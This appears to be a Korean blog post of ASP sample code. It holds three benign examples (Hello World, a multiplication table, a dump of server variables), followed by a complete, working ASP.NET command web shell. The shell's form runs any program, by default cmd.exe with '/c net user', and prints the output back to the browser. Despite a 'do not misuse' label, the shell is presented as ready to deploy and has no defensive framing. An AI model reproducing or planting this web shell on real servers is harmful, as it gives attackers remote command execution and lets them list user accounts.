[ASP] Sample Code + CMD Webshell

1. Hello World! 출력

<!DOCTYPE html>
<html>
<body>

<%response.write("Hello World!")%>

</body>

</html>

2. 구구단 출력

<%

response.write "<table border='1'><tr>"

 

 for i = 1 to 9

 response.write "<td>"

  

  for j = 1 to 9

   response.write  i & "*" & j & " = " & i * j & "&nbsp;<br>"

  next

  

  

  If i = 3 or i = 6 then

   response.write "</td><tr>"

  Else

   response.write "</td>"

  end if

 

 next

  

  response.write "</tr></table>"

%>

3. 서버 정보 

<HTML>

<BODY>

<TABLE>

<% for each key in Request.ServerVariables %>

<TR>

<TD><%=key %></TD>

<TD>

<%

if Request.ServerVariables(key) = "" Then

Response.Write " "

else

Response.Write Request.ServerVariables(key)

end if

%>

</TD>

</TR>

<% Next %>

</TABLE>

</BODY>

</HTML>

4. CMD Webshell (악용금지!!)

   <%@ Page Language="VB" Debug="true" %>

   <%@ import Namespace="system.IO" %>

   <%@ import Namespace="System.Diagnostics" %>

   

   <script runat="server">      

   Sub RunCmd(Src As Object, E As EventArgs)            

     Dim myProcess As New Process()            

     Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)            

     myProcessStartInfo.UseShellExecute = false            

     myProcessStartInfo.RedirectStandardOutput = true            

     myProcess.StartInfo = myProcessStartInfo            

     myProcessStartInfo.Arguments=xcmd.text            

     myProcess.Start()            

     Dim myStreamReader As StreamReader = myProcess.StandardOutput            

     Dim myString As String = myStreamReader.Readtoend()            

     myProcess.Close()            

     mystring=replace(mystring,"<","&lt;")            

     mystring=replace(mystring,">","&gt;")            

     result.text= vbcrlf & "<pre>" & mystring & "</pre>"    

   End Sub

   </script>

   

   <html>

   <body>    

   <form runat="server">        

   <p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>        

   <asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>        

   <p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>        

   <asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>        

   <p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>        

   <p><asp:Label id="result" runat="server"></asp:Label>       

   </form>

   </body>

   </html>